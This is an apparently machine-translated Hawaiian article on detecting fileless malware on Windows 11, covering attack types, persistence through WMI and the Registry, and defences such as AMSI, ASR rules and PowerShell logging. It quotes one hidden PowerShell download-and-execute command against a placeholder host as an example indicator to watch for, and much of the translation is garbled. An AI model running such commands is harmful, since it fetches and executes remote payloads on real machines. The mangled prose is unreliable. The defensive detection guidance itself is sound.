Pehea e ʻike ai i ka malware fileless pilikia ma Windows 11

¿Pehea e ʻike ai i ka malware fileless pilikia? Ua hoʻonui nui ʻia ka hana hoʻouka ʻana me ka faila ʻole, a ʻoi aku ka ʻino, ʻAʻole palekana ʻo Windows 11Hoʻopili kēia ala i ka disk a hilinaʻi i ka hoʻomanaʻo a me nā mea hana pono; ʻo ia ke kumu e hakakā ai nā polokalamu antivirus e pili ana i ka pūlima. Inā ʻoe e ʻimi nei i kahi ala hilinaʻi e ʻike ai, aia ka pane ma ka hui ʻana telemetry, ka nānā ʻana i ke ʻano, a me nā mana Windows.

I loko o ka kaiaola o kēia manawa, hui pū nā hoʻolaha e hoʻomāinoino ana i ka PowerShell, WMI, a i ʻole Mshta me nā ʻenehana ʻoi aku ka maʻalahi e like me nā injections memory, hoʻomau "me ka hoʻopā ʻole" i ka disk, a hiki hoʻomāinoino firmwareʻO ke kī ʻo ka hoʻomaopopo ʻana i ka palapala hoʻoweliweli, nā pae hoʻouka, a me nā hōʻailona a lākou e haʻalele ai inā hiki i nā mea āpau i loko o RAM.

He aha ka fileless malware a no ke aha e hopohopo ai i loko Windows 11?

Ke kamaʻilio nei mākou e pili ana i nā hoʻoweliweli "fileless", ke ʻōlelo nei mākou i ka code malicious kēlā ʻAʻole pono ʻoe e waiho i nā executable hou i ka waihona waihona e hana. Hoʻokomo pinepine ʻia ia i loko o nā kaʻina hana a hoʻokō ʻia ma RAM, e hilinaʻi ana i nā unuhi a me nā binaries i kau inoa ʻia e Microsoft (e laʻa, PowerShell, WMI, rundll32, mshtaHoʻemi kēia i kou wāwae wāwae a hiki iā ʻoe ke kāpae i nā ʻenekini e ʻimi wale i nā faila kānalua.

ʻO nā palapala keʻena a i ʻole nā ​​​​PDF e hoʻohana ana i nā nāwaliwali e hoʻomaka i nā kauoha i manaʻo ʻia he ʻāpana o ka hanana, no ka mea hoʻoikaika i ka hoʻokō ma ka hoʻomanaʻo me ka waiho ʻole ʻana i nā binaries pono no ka nānā ʻana. Hana ino ia macros a me DDE Ma ke Keʻena, ʻoiai ke holo nei ke code i nā kaʻina hana kūpono e like me WinWord.

Hoʻohui nā mea hoʻouka i ka ʻenekinia pilikanaka (phishing, spam links) me nā pahele ʻenehana: hoʻomaka ka kaomi o ka mea hoʻohana i kahi kaulahao kahi e hoʻoiho ai kahi palapala a hoʻokō i ka uku hope i ka hoʻomanaʻo, ka pale ʻana i ka waiho ʻana i kahi meheu ma ka diski. Loaʻa nā pahuhopu mai ka ʻaihue data a hiki i ka hoʻokō ransomware, i ka neʻe ʻana o ka ʻaoʻao.

Typologies ma ka wāwae i ka ʻōnaehana: mai 'maʻemaʻe' a hiki i nā hybrids

No ka pale ʻana i nā manaʻo huikau, he mea kōkua ke hoʻokaʻawale i nā mea hoʻoweliweli e ko lākou pae o ka launa pū ʻana me ka ʻōnaehana faila. Hoʻomaopopo kēia hoʻokaʻawale He aha ka mea e hoʻomau nei, ma hea kahi e noho ai ke code, a he aha nā hōʻailona e waiho ai?.

ʻAno I: ʻaʻohe hana faila

ʻAʻole kākau ʻo malware fileless loa i kekahi mea i ka disk. ʻO kahi laʻana maʻamau ka hoʻohana ʻana i a pilikia o ka pūnaewele (e like me ka EternalBlue vector i ka lā) e hoʻokō i kahi backdoor e noho ana i ka hoʻomanaʻo kernel (nā hihia e like me DoublePulsar). Maʻaneʻi, hiki i nā mea a pau i ka RAM aʻaʻohe mea hana i loko o ka pūnaewele waihona.

ʻO kekahi koho e hoʻohaumia i ka lako polokalamu paʻa o nā ʻāpana: BIOS/UEFI, nā mea hoʻopili pūnaewele, nā peripherals USB (nā ʻano ʻano BadUSB) a i ʻole nā ​​ʻōnaehana CPU. Hoʻomau lākou ma o ka hoʻomaka ʻana a me ka hoʻouka hou ʻana, me ka paʻakikī i hoʻohui ʻia Ke nānā nei nā huahana liʻiliʻi i ka firmwareHe mau hoʻouka paʻakikī kēia, ʻaʻole pinepine, akā pōʻino ma muli o ko lākou aihue a me ka lōʻihi.

ʻAno II: Ka hana hoʻopaʻa waihona pololei

Maʻaneʻi, ʻaʻole "haʻalele" ka malware i kāna mea hoʻokō ponoʻī, akā hoʻohana i nā ipu i mālama ʻia e ka ʻōnaehana i mālama pono ʻia ma ke ʻano he faila. No ka laʻana, backdoors that plant kauoha powershell i ka waihona WMI a hoʻomaka i kāna hoʻokō me nā kānana hanana. Hiki ke hoʻokomo iā ia mai ka laina kauoha me ka ʻole o ka hoʻokuʻu ʻana i nā binaries, akā noho ka waihona WMI ma ka disk ma ke ʻano he ʻikepili kūpono, e paʻakikī ai ka hoʻomaʻemaʻe me ka ʻole o ka pili ʻana i ka ʻōnaehana.

Mai kahi manaʻo kūpono ua manaʻo ʻia lākou he faila ʻole, no ka mea, ʻo kēlā pahu (WMI, Registry, etc.) ʻAʻole ia he mea hoʻokō maʻamau i ʻike ʻia A ʻo kona hoʻomaʻemaʻe ʻana, ʻaʻole ia he mea ʻole. ʻO ka hopena: ka hoʻomau malū me ka ʻike "kuʻuna" liʻiliʻi.

ʻAno III: Pono nā faila e hana

Ke mālama nei kekahi mau hihia i kahi 'fileless' hoʻomau Ma ka pae logical, pono lākou i kahi hoʻomaka waihona. ʻO ka laʻana maʻamau ʻo Kovter: hoʻopaʻa inoa ʻo ia i kahi huaʻōlelo pūpū no ka hoʻonui ʻana; ke wehe ʻia kahi faila me kēlā hoʻonui, hoʻomaka ʻia kahi palapala liʻiliʻi e hoʻohana ana i ka mshta.exe, e kūkulu hou ana i ke kaula ʻino mai ka Registry.

ʻO ka mea hoʻopunipuni, ʻaʻole i loaʻa i kēia mau faila "maunu" me nā hoʻonui maʻamau i kahi uku analyzable, a ʻo ka hapa nui o ke code e noho ana i ka kakau ana (kahi pahu). ʻO ia ke kumu i hoʻokaʻawale ʻia ai lākou ma ke ʻano he fileless i ka hopena, ʻoiai ʻo ka ʻōlelo koʻikoʻi ke hilinaʻi nei lākou i hoʻokahi a i ʻole nā ​​mea kiʻi diski ma ke ʻano he kumu.

Nā Vectors a me nā 'host' o ka maʻi: kahi e komo ai a ma kahi e peʻe ai

No ka hoʻomaikaʻi ʻana i ka ʻike, he mea nui ka palapala ʻāina i ka wahi o ke komo ʻana a me ka pūʻali o ka maʻi. Kōkua kēia kuanaʻike i ka hoʻolālā nā mana kikoʻī E koho mua i ka telemetry kūpono.

hoʻomanaʻo

• Ma muli o ka waihona (Type III): Hiki i nā palapala, nā mea hoʻokō, nā faila Flash/Java hoʻoilina, a i ʻole nā ​​faila LNK ke hoʻohana i ka polokalamu kele pūnaewele a i ʻole ka mīkini e hoʻoili iā lākou e hoʻouka i ka shellcode i ka hoʻomanaʻo. ʻO ka vector mua he faila, akā hele ka uku i RAM.
• Ma muli o ka pūnaewele (ʻAno I): ʻO kahi pūʻolo e hoʻohana ana i kahi nāwaliwali (e laʻa, ma SMB) e hoʻokō i ka hoʻokō ma ka ʻāina hoʻohana a i ʻole ka kernel. Ua hoʻolaha ʻo WannaCry i kēia ala. Hoʻouka hoʻomanaʻo pololei me ka waihona hou ole.

lako paʻa

• Pūnaewele (ʻAno I): Hiki ke hoʻololi a hoʻokomo ʻia ke code. Paʻakikī ke nānā a hoʻomau i waho o ka OS.
• CPU a me nā ʻōnaehana hoʻokele (ʻAno I): Ua hōʻike nā ʻenehana e like me Intel's ME/AMT i nā ala i Pūnaewele a me ka hoʻokō ʻana ma waho o ka OSHoʻouka ia ma kahi haʻahaʻa loa, me ke kiʻekiʻe o ka stealth.
• USB (ʻAno I): ʻAe ʻo BadUSB iā ʻoe e hoʻonohonoho hou i kahi kaʻa USB e hoʻohālikelike i kahi kīpē a i ʻole NIC a hoʻomaka i nā kauoha a i ʻole ka hoʻihoʻi hou ʻana i ke kaʻa.
• BIOS / UEFI (ʻAno I): ka hoʻoponopono hou ʻana i ka firmware (nā hihia e like me Mebromi) e holo ana ma mua o nā kāmaʻa Windows.
• Mea nānā hoʻi (ʻAno I): Ke hoʻokō nei i kahi mini-hypervisor ma lalo o ka OS e hūnā i kona alo. Rare, akā ua ʻike ʻia ma ke ʻano o nā rootkits hypervisor.

ʻO ka hoʻokō a me ka hoʻokō

• Ma muli o ka waihona (Type III): EXE/DLL/LNK a i ʻole nā ​​​​hana i hoʻonohonoho ʻia e hoʻomaka i nā injections i nā kaʻina kūpono.
• macros (Type III): Hiki i ka VBA ma Office ke hoʻokaʻawale a hoʻokō i nā uku uku, me ka ransomware piha, me ka ʻae o ka mea hoʻohana ma o ka hoʻopunipuni.
• Hōʻolālā (Ke ʻano II): PowerShell, VBScript a i ʻole JScript mai ka faila, laina kauoha, nā lawelawe, Kakau inoa a i ʻole WMIHiki i ka mea hoʻouka ke paʻi i ka palapala i kahi kau mamao me ka ʻole o ka pā ʻana i ka disk.
• Hoʻopaʻa pahu (MBR/Boot) (Ke ʻano II): Hoʻopau nā ʻohana e like me Petya i ka ʻāpana boot e lawe i ka mana ma ka hoʻomaka ʻana. Aia ma waho o ka ʻōnaehana faila, akā hiki ke loaʻa i ka OS a me nā hoʻonā hou e hiki ke hoʻihoʻi.

Pehea ka hana ʻana o nā hoʻouka ʻole: nā ʻāpana a me nā hōʻailona

ʻOiai ʻaʻole lākou e haʻalele i nā faila i hiki ke hoʻokō ʻia, e hahai ana nā hoʻolaha i kahi loiloi. ʻO ka hoʻomaopopo ʻana iā lākou e hiki ai ke nānā. nā hanana a me nā pilina ma waena o nā kaʻina hana e waiho ana i kahi hoailona.

• Komo muaHoʻouka ʻia ka phishing me ka hoʻohana ʻana i nā loulou a i ʻole nā ​​mea hoʻopili, nā pūnaewele i hoʻopaʻa ʻia, a i ʻole nā ​​​​hōʻoia i ʻaihue ʻia. Hoʻomaka nā kaulahao he nui me kahi palapala Office e hoʻomaka ai i kahi kauoha PowerShell.
• Hoʻomau: nā puka hope ma o WMI (nā kānana a me nā kau inoa), Nā kī hoʻokō Registry a i ʻole nā ​​hana i hoʻonohonoho ʻia e hoʻomaka hou i nā palapala me ka ʻole o kahi faila hewa hou.
• ExfiltrationKe hōʻiliʻili ʻia ka ʻike, hoʻouna ʻia ia ma waho o ka pūnaewele me ka hoʻohana ʻana i nā kaʻina hilinaʻi (nā polokalamu kele, PowerShell, bitsadmin) e hoʻohui i nā kaʻa.

ʻO kēia hiʻohiʻona he insidious no ka mea hōʻailona hoʻouka kaua Hūnā lākou ma ke ʻano maʻamau: nā hoʻopaʻapaʻa laina kauoha, ka hoʻopaʻa ʻana i ke kaʻina hana, nā pilina i waho a i ʻole ke komo ʻana i nā API injection.

Nā ʻenehana maʻamau: mai ka hoʻomanaʻo a i ka hoʻopaʻa ʻana

Ke hilinaʻi nei nā mea hoʻokani ma kahi ākea o kiʻina hana e hoʻonui i ka huna. He mea kōkua ka ʻike ʻana i nā mea maʻamau e hoʻāla i ka ʻike pono.

• Noho ma ka hoʻomanaʻo: Ke hoʻouka ʻana i nā uku i loko o kahi kaʻina hana hilinaʻi e kali nei no ka hoʻāla ʻana. rootkits a me nā makau I ka kernel, hoʻokiʻekiʻe lākou i ka pae o ka hūnā.
• Hoʻomau i ka KakauE mālama i nā blobs i hoʻopili ʻia i nā kī a hoʻomaʻemaʻe iā lākou mai kahi mea hoʻolaha kūpono (mshta, rundll32, wscript). Hiki i ka mea hoʻonoho ephemeral ke hoʻopau iā ia iho e hōʻemi i kona wāwae.
• ʻO ka phishing hōʻoiaKe hoʻohana nei i nā inoa inoa ʻaihue a me nā ʻōlelo huna, hoʻokō ka mea hoʻouka i nā pūpū mamao a me nā mea kanu komo hāmau ma ka Kakau a i ʻole WMI.
• 'Aʻole faila' RansomwareHoʻonohonoho ʻia ka hoʻopunipuni a me ke kamaʻilio C2 mai RAM, e hōʻemi ana i nā manawa no ka ʻike ʻana a ʻike ʻia ka pōʻino.
• Nā pahu hana: nā kaulahao automated e ʻike i nā nāwaliwali a kau i nā uku hoʻomanaʻo wale nō ma hope o ke kaomi ʻana o ka mea hoʻohana.
• Nā palapala me ke code: nā macros a me nā mīkini e like me DDE e hoʻomaka i nā kauoha me ka mālama ʻole ʻana i nā mea hoʻokō i ka disk.

Ua hōʻike mua nā haʻawina ʻoihana i nā kiʻekiʻe kaulana: i hoʻokahi manawa o 2018, a piʻi ma luna o 90% i ka hoʻouka ʻana i ke kaulahao a me PowerShell, kahi hōʻailona e makemake ʻia ka vector no kona pono.

ʻO ka paʻakikī no nā ʻoihana a me nā mea hoʻolako: no ke aha ʻaʻole lawa ka pale ʻana

He mea hoʻowalewale ia e hoʻopau i ka PowerShell a pāpā paha i nā macros mau loa, akā E uhaki ʻoe i ka hanaHe pou ʻo PowerShell o ka hoʻoponopono hou ʻana a he mea nui ka Office ma ka ʻoihana; ʻAʻole hiki ke pale makapō.

Eia kekahi, aia nā ala e kāpae ai i nā mana kumu: e holo ana i ka PowerShell ma o DLL a me rundll32, nā palapala hōʻailona i EXE, E lawe mai i kāu kope ponoʻī o PowerShell a i ʻole e hūnā i nā palapala i nā kiʻi a unuhi iā lākou i loko o ka hoʻomanaʻo. No laila, ʻaʻole hiki ke hoʻokumu wale ʻia ka pale ma ka hōʻole ʻana i ke ola o nā mea hana.

ʻO kekahi hewa maʻamau ʻo ka hāʻawi ʻana i ka hoʻoholo holoʻokoʻa i ke ao: inā e kali ka ʻelele no ka pane mai ke kikowaena, Nalo ʻoe i ka pale manawa maoliHiki ke hoʻoili ʻia ka ʻikepili Telemetry e hoʻonui i ka ʻike, akā ʻo ka Pono ka mitigation ma ka hope.

Pehea e ʻike ai i ka malware fileless i Windows 11: telemetry a me ka hana

ʻO ka hoʻolālā lanakila nānā i nā kaʻina hana a me ka hoʻomanaʻoʻAʻole nā ​​faila. ʻOi aku ka paʻa o nā ʻano ʻino ma mua o nā ʻano i lawe ʻia e kahi faila, e hoʻolilo iā lākou i mea kūpono no nā mīkini pale.

• AMSI (Antimalware Scan Interface)Hoʻopili ia i nā palapala PowerShell, VBScript, a i ʻole JScript ʻoiai ke kūkulu ikaika ʻia lākou i ka hoʻomanaʻo. Maikaʻi no ka hopu ʻana i nā kaula i hoʻopaʻa ʻia ma mua o ka hoʻokō ʻana.
• Nānā kaʻina hana: hoʻomaka/hoʻopau, PID, nā mākua a me nā keiki, nā ala, laina kauoha a me nā hashes, me nā lāʻau hoʻokō e hoʻomaopopo i ka moʻolelo piha.
• Nānā hoʻomanaʻo: ka ʻike ʻana i nā injections, reflective a i ʻole nā ​​ukana PE me ka hoʻopā ʻole ʻana i ka disk, a me ka nānā ʻana i nā wahi hoʻokō ʻokoʻa.
• Palena māhele hoʻomaka: ka hoʻomalu a me ka hoʻihoʻi ʻana o ka MBR/EFI i ka hihia o ka hoʻopunipuni.

I loko o ka kaiaola Microsoft, hoʻohui ʻo Defender for Endpoint i ka AMSI, ka nānā ʻana i ke ʻanoHoʻohana ʻia ka nānā ʻana i ka hoʻomanaʻo a me ke aʻo ʻana i ka mīkini e hoʻopaʻa ʻia i ke ao no ka hoʻonui ʻana i ka ʻike ʻana i nā ʻano hou a i ʻole nā ​​​​mea ʻokoʻa. Hoʻohana nā mea kūʻai ʻē aʻe i nā ala like me nā mīkini noho kernel.

Hoʻohālikelike maoli o ka pilina: mai ka palapala i PowerShell

E noʻonoʻo i kahi kaulahao kahi e hoʻoiho ai ʻo Outlook i kahi mea hoʻopili, wehe ʻo Word i ka palapala, hoʻohana ʻia ka ʻike hana, a hoʻomaka ʻia ʻo PowerShell me nā ʻāpana kānalua. E hōʻike ana ka telemetry kūpono i ka Laina kauoha (e laʻa, ExecutionPolicy Bypass, huna puka makani), hoʻopili i kahi kikowaena hilinaʻi ʻole a hana i kahi kaʻina hana keiki e hoʻokomo iā ia iho ma AppData.

Hiki i kahi luna me ka pōʻaiapili kūloko kū a hoʻohuli hana ʻino me ka hana lima ʻole, me ka hoʻolaha ʻana i ka SIEM a i ʻole ma o ka leka uila/SMS. Hoʻohui kekahi mau huahana i kahi papa kuhikuhi kumu kumu (StoryLine-type models), ʻaʻole ia e kuhikuhi i ke kaʻina hana ʻike ʻia (Outlook/Word), akā i ka pae ʻino piha a me kona kumu e hoʻomaʻemaʻe piha i ka ʻōnaehana.

ʻO kahi hiʻohiʻona kauoha maʻamau e nānā ai e like paha me kēia: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');ʻAʻole ʻo Logic ka string pololei, akā ka hoʻonohonoho o nā hōʻailona: kaʻalo ʻana i nā kulekele, ka puka huna, ka hoʻoiho maʻemaʻe, a me ka hoʻokō ʻana i ka hoʻomanaʻo.

AMSI, pipeline a me ke kuleana o kēlā me kēia mea hana: mai ka hopena i ka SOC

Ma waho aʻe o ka hoʻopaʻa ʻana i ka palapala, hoʻonohonoho ka hale hoʻolālā paʻa i nā hana e hoʻomaʻamaʻa i ka hoʻokolokolo a me ka pane. ʻO ka nui o nā hōʻike ma mua o ka hoʻokō ʻana i ka ukana, ʻoi aku ka maikaʻi., ʻoi loa.

• Hoʻopaʻa palapalaHāʻawi ʻo AMSI i ka ʻike (ʻoiai inā i hana ʻia ma ka lele) no ka loiloi paʻa a me ka ikaika i loko o kahi pipeline malware.
• Kaʻina hanaʻOhi ʻia nā PID, binaries, hashes, nā ala, a me nā ʻikepili ʻē aʻe. mau hoʻopaʻapaʻa, hoʻokumu i nā kumulāʻau kaʻina i alakaʻi i ka ukana hope.
• ʻIke a hōʻikeHōʻike ʻia nā ʻike ma ka console huahana a hoʻouna ʻia i nā kahua pūnaewele (NDR) no ka ʻike ʻana i ka hoʻolaha.
• Hoʻohiki mea hoʻohanaʻOiai inā hoʻokomo ʻia kahi palapala i ka hoʻomanaʻo, ʻo ka framework Hoʻopili ʻo AMSI iā ia i nā mana kūpono o Windows.
• Mana hooponopono: hoʻonohonoho kulekele e hiki ai ke nānā i ka palapala, ka hoʻopaʻa ʻana i ka hana a me ka hana ʻana i nā hōʻike mai ka console.
• Hana SOC: ka unuhi ʻana o nā mea waiwai (VM UUID, OS version, script type, initiator process and its parents, hashes and command lines) e hana hou i ka mōʻaukala a nā lula hāpai e hiki mai ana.

Ke hiki i ka paepae ke hoʻokuʻu aku i ka pale hoʻomanaʻo Hoʻopili ʻia me ka hoʻokō, hiki i nā mea noiʻi ke hana i nā ʻike hou a hoʻonui i ka pale i nā ʻano like ʻole.

Nā hana maʻamau ma Windows 11: ka pale a me ka hahai holoholona

Ma waho aʻe o ka loaʻa ʻana o EDR me ka nānā hoʻomanaʻo a me ka AMSI, Windows 11 hiki iā ʻoe ke pani i nā wahi hoʻouka a hoʻomaikaʻi i ka ʻike me nā mana maoli.

• Kakau inoa a me nā kapu ma PowerShellHiki iā Script Block Logging a me Module Logging, hoʻohana i nā ʻano i kaupalena ʻia inā hiki, a hoʻomalu i ka hoʻohana ʻana o Kaʻalo/Hūnā.
• Nā Rula Hoʻemi i ka ʻili hoʻouka (ASR).: hoʻokuʻu ʻia nā palapala e nā kaʻina Office a Hoʻomāinoino WMI/PSExec inā ʻaʻole pono.
• Nā kulekele macro Office: hoʻopau ʻia ma ke ʻano maʻamau, kau inoa macro kūloko a me nā papa inoa hilinaʻi koʻikoʻi; nānā i nā kahe DDE hoʻoilina.
• WMI Hooia a kakau inoa: nānā i nā kau inoa hanana a me nā kī hoʻokō maʻalahi (Run, RunOnce, Winlogon), a me ka hana hana. hoʻonohonoho ʻia.
• Pale hoʻomaka: ho'āla iā Secure Boot, nānā i ka pono MBR/EFI a hōʻoia ʻaʻohe hoʻololi i ka hoʻomaka ʻana.
• Hoʻopili a paʻakikī: pani i nā mea nawaliwali i hoʻohana ʻia i nā polokalamu kele pūnaewele, nā ʻāpana Office, a me nā lawelawe pūnaewele.
• ʻO ka ʻike: hoʻomaʻamaʻa i nā mea hoʻohana a me nā hui ʻenehana i ka phishing a me nā hōʻailona o pepehi huna.

No ka hahai holoholona, ​​​​e nānā i nā nīnau e pili ana i: ka hana ʻana i nā kaʻina hana e ke Keʻena iā PowerShell/MSHTA, nā hoʻopaʻapaʻa me downloadstring/downloadfileNā palapala me ka hoʻomaʻamaʻa akaka, nā hoʻoheheʻe noʻonoʻo, a me nā pūnaewele i waho i nā TLD kānalua. E kuhikuhi i kēia mau hōʻailona me ka kaulana a me ka pinepine e hōʻemi i ka walaʻau.

He aha ka mea hiki ke ʻike i kēlā me kēia mīkini i kēia lā?

Hoʻohui nā ʻōnaehana ʻoihana a Microsoft i ka AMSI, nā ʻikepili hana, nānā i ka hoʻomanaʻo a me ka pale ʻana i ka ʻāpana boot, a me nā hiʻohiʻona ML i hoʻokumu ʻia i ke ao e pale aku i nā mea hoʻoweliweli e kū mai ana. Hoʻohana nā mea kūʻai ʻē aʻe i ka nānā ʻana i ka kernel-level e hoʻokaʻawale i ka ʻino mai ka polokalamu benign me ka rollback maʻalahi o nā loli.

ʻO kahi ala e pili ana i nā moʻolelo hoʻokō Hiki iā ʻoe ke ʻike i ke kumu kumu (no ka laʻana, kahi hoʻopili Outlook e hoʻoulu ai i ke kaulahao) a hoʻēmi i ka lāʻau holoʻokoʻa: nā palapala, nā kī, nā hana, a me nā binaries waena, e pale ana i ka paʻa ʻana i ka hōʻailona ʻike ʻia.

Nā hewa maʻamau a pehea e pale aku ai iā lākou

ʻO ka pale ʻana i ka PowerShell me ka ʻole o kahi hoʻolālā hoʻokele ʻē aʻe ʻaʻole pono wale nō, akā aia kekahi nā ala e kāhea aku ai me ke ʻoleHoʻohana like ia i nā macros: hoʻokele ʻoe iā lākou me nā kulekele a me nā pūlima, a i ʻole e pilikia ka ʻoihana. ʻOi aku ka maikaʻi o ka nānā ʻana i ka telemetry a me nā lula pili.

ʻO kekahi hewa maʻamau ʻo ka manaʻoʻiʻo e hoʻoponopono nā noi whitelisting i nā mea āpau: hilinaʻi pololei ka ʻenehana fileless i kēia. nā polokalamu hilinaʻiPono ka mana e nānā i kā lākou hana a pehea lākou e pili ai, ʻaʻole wale inā ʻae ʻia lākou.

Me nā mea a pau i luna aʻe nei, pau ʻole ka lilo ʻana o ka malware fileless i "ghost" ke nānā ʻoe i ka mea nui: ʻano, hoʻomanaʻo, a me ke kumu o kēlā me kēia hoʻokō. ʻO ka hoʻohui ʻana i ka AMSI, telemetry kaʻina waiwai, nā mana Windows 11, a me kahi papa EDR me ka nānā ʻana i ke ʻano e hāʻawi iā ʻoe i ka pono. E hoʻohui i nā kulekele ʻoiaʻiʻo no nā macros a me PowerShell, WMI/Registry auditing, a me ka hopu ʻana e hoʻokumu i nā laina kauoha a me nā kumu lāʻau, a he pale kāu e ʻoki ai i kēia mau kaulahao ma mua o ke kani ʻana.